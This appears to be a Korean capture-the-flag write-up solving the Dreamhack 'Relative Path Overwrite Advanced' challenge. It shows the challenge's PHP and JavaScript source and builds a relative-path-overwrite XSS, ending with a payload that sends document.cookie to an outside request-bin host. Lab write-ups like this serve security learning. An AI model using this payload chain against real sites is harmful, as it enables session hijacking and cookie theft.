[Dreamhack] Level 2: Relative Path Overwrite Advanced

1. 문제 

https://dreamhack.io/wargame/challenges/440

Relative Path Overwrite Advanced

 

2. 해결 과정 

기본적인 코드는 Relative Path Overwrite와 거의 동일하다. 

 

index.php의 코드이다. 

GET방식으로 page를 받고, 이 page에 ..이나 : 또는 / 이 포함되는지 확인한다. 

포함되어 있지 않는다면 해당 파일을 include 한다. 

<html>
<head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css">
<title>Relative-Path-Overwrite-Advanced</title>
</head>
<body>
    <!-- Fixed navbar -->
    <nav class="navbar navbar-default navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <a class="navbar-brand" href="/">Relative-Path-Overwrite-Advanced</a>
        </div>
        <div id="navbar">
          <ul class="nav navbar-nav">
            <li><a href="/">Home</a></li>
            <li><a href="/?page=vuln&param=dreamhack">Vuln page</a></li>
            <li><a href="/?page=report">Report</a></li>
          </ul>

        </div><!--/.nav-collapse -->
      </div>
    </nav><br/><br/><br/>
    <div class="container">
    <?php
          $page = $_GET['page'] ? $_GET['page'].'.php' : 'main.php';
          if (!strpos($page, "..") && !strpos($page, ":") && !strpos($page, "/"))
              include $page;
      ?>
    </div>
</body>
</html>

 

report.php

<?php
if(isset($_POST['path'])){
    exec(escapeshellcmd("python3 /bot.py " . escapeshellarg(base64_encode($_POST['path']))) . " 2>/dev/null &", $output);
    echo($output[0]);
}
?>

<form method="POST" class="form-inline">
    <div class="form-group">
        <label class="sr-only" for="path">/</label>
        <div class="input-group">
            <div class="input-group-addon">http://127.0.0.1/</div>
            <input type="text" class="form-control" id="path" name="path" placeholder="/">
        </div>
    </div>
    <button type="submit" class="btn btn-primary">Report</button>
</form>

 

vuln.php의 코드이다. 

여기서 pram으로 url을 받아온다.

filter.js 파일이 로드되지 않는 등의 이유로 filter가 undefined 되거나 필터링에 걸리면  "nope !!" 을 출력한다. 

필터링을 통과하면 id가 param인 <pre></pre> 태그안에 innerHTML로 삽입된다. 

따라서, 이를 이용하면 dom based xss가 발생할 수 있을 것이다.

<script src="filter.js"></script>
<pre id=param></pre>
<script>
    var param_elem = document.getElementById("param");
    var url = new URL(window.location.href);
    var param = url.searchParams.get("param");
    if (typeof filter === 'undefined') {
        param = "nope !!";
    }
    else {
        for (var i = 0; i < filter.length; i++) {
            if (param.toLowerCase().includes(filter[i])) {
                param = "nope !!";
                break;
            }
        }
    }

    param_elem.innerHTML = param;
</script>

 

 

filter.js

script 태그, onerror 등의 이벤트 핸들러 등을 필터링 하고 있다.

이전문제와 다른 점은  filter.js가 static 디렉토리 안에 있다는 것이다. 따라서 해당 파일의 경로를 조작하는 것은 어렵다.

var filter = ["script", "on", "frame", "object"];

 

 

404.php

 filter.js를 잘못 요청했을 때 (즉, 파일이 존재하지 않거나 경로가 잘못되어 찾을 수 없을 때) not found를 반환한다. 

<?php 
    header("HTTP/1.1 200 OK");
    echo $_SERVER["REQUEST_URI"] . " not found."; 
?>

 

현재 nope!! 이 뜨는 이유는 vuln 페이지에서 /filter.js 에 대한 스크립트가 실행되었지만, 파일 경로가 잘못되어 파일을 찾을 수 없는 것이다. 개발자도구를 보면 filter.js라는 이름의 파일이 로드되어 있고, 파일경로가 잘못됨에 따라 404.php가 로드되어 그 결과가 filter.js로 덮어씌워진 것을 볼 수 있다. 

 

따라서 404.php를 이용해 filter.js의 내용을 덮어쓰도록 할 것이다. 

URL 요청에서 /과 //는 같은 것으로 해석된다.

오류가 없도록 실행되기 위해서 /를 두번 써서 요청해준다.

/index.php/hihi//?page=vuln&param=dreamhack

 

해당 위치에 스크립트 문이 실행되도록 alert(1)을 넣으면 

/index.php/alert(1);//?page=vuln&param=dreamhack

 

실행되지 않는다. 그 이유는 앞의 입력값과 이어지기 때문이다. 따라서 ;를 함께 입력하여 스크립트문이 실행되도록 해야 한다.

 

alert(1)을 성공적으로 실행하였다.

/;alert(1);//?page=vuln&param=dreamhack

드림핵 request.bin을 이용해서 쿠키값을 탈취하였다. 

따라서 report 페이지에서 location.href 를 이용해서 서버에 쿠키값을 보내도록 하였다. 

index.php/;location.href='https://sehmurj.request.dreamhack.games/'+document.cookie;//?page=vuln&param=dreamhack

 

성공